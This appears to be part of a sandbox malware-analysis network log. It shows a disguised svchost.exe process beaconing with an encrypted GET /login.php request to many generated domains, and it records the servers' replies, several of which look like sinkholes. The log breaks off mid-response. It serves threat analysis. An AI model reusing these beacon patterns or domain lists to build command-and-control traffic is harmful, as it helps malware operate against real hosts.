37	192.168.2.5	49369	52.34.198.229	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:30.937434912 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:31.676779985 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:43:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=6039f0f8b55b03d0af90373273dc6cf0\|8.46.123.33\|1724431411\|1724431411\|0\|1\|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.5	60101	44.221.84.105	80

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:33.032958984 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:33.519668102 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:43:33 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=07971a32f0a4ae25246b18025c66802a\|8.46.123.33\|1724431413\|1724431413\|0\|1\|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	59528	162.255.119.102	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.366604090 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.103714943 CEST	303	IN	HTTP/1.1 302 Found Date: Fri, 23 Aug 2024 16:43:35 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Location: http://www.gahyqah.com/login.php X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	59529	3.64.163.50	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.366822958 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.007133007 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:43:34 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:43:35.008361101 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.200848103 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:43:35 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	59530	188.114.96.3	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.377120972 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.089855909 CEST	793	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:43:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wh2yImWBkaZmD%2FlL0eLcgSBLlkob0KDAXNrMFbLrs5gEN0nmVZv4kA0aDU2f866l1P5%2BTKKm7QDLDfUDh04Jz3MiA9Nly%2B4jSwgsx6oNl9h4MfqcIKen0V%2FbTYVZqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8ff65e2143b3-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:43:36.280062914 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:36.636260986 CEST	788	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:43:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4bX%2F7kfHJMDbeb1JIc5%2Fbp1XGgU9ZYbuH5Er2YJMwO30c2z0MVz3TIR%2BMCLzTrHA0WEqFrzUthJMYWmjrxDeVEL8kfSRII%2F2Y03XJUSDTMqtn5wtHalDNVwbXJszgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c9000187d43b3-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Aug 23, 2024 18:43:36.721921921 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	59531	172.234.222.143	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.477802038 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	59532	44.221.84.105	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.551630974 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Cookie: btst=ba785a403bc90255316f056071bf01aa\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.027647972 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:43:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ba785a403bc90255316f056071bf01aa\|8.46.123.33\|1724431414\|1724431332\|41\|2\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	59533	18.208.156.248	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.551754951 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Cookie: btst=aa184787ed2d77e1f6f59c2dc950863e\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.030492067 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:43:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=aa184787ed2d77e1f6f59c2dc950863e\|8.46.123.33\|1724431414\|1724431332\|41\|2\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	59534	199.191.50.83	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.551985025 CEST	306	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Cookie: vsid=918vr471976932991951418 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:36.336677074 CEST	620	IN	HTTP/1.1 302 Found Date: Fri, 23 Aug 2024 16:43:34 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Location: //ww6.galyqaz.com Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	59535	3.94.10.34	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.553793907 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Cookie: btst=a03933307436d0e87a275c8dab3cea9f\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.027920008 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:43:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a03933307436d0e87a275c8dab3cea9f\|8.46.123.33\|1724431414\|1724431332\|41\|2\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	59536	44.221.84.105	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.556453943 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Cookie: btst=3bd5de231d5c30f08e390492f5c039b1\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.057529926 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:43:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3bd5de231d5c30f08e390492f5c039b1\|8.46.123.33\|1724431414\|1724431332\|41\|2\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	59537	208.100.26.245	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.559590101 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.062794924 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:43:35 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:43:35.063641071 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.179580927 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:43:35 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	59538	69.162.80.57	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:34.577023029 CEST	318	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Cookie: sid=a5fae49c-616e-11ef-add0-e1f04491a098 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.111985922 CEST	772	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 481 content-type: text/html; charset=utf-8 date: Fri, 23 Aug 2024 16:43:34 GMT server: nginx Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 44 51 7a 4f 44 59 78 4e 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 30 4e 44 4d 78 4e 44 45 31 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6d 34 32 61 57 59 79 5a 47 68 6b 5a 32 56 6a 61 32 4a 68 61 44 41 77 59 57 6c 6c 63 57 49 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 51 30 4d 7a 45 30 4d 54 [TRUNCATED] Data Ascii: <html><head><title>Loading...</title></head><body><script 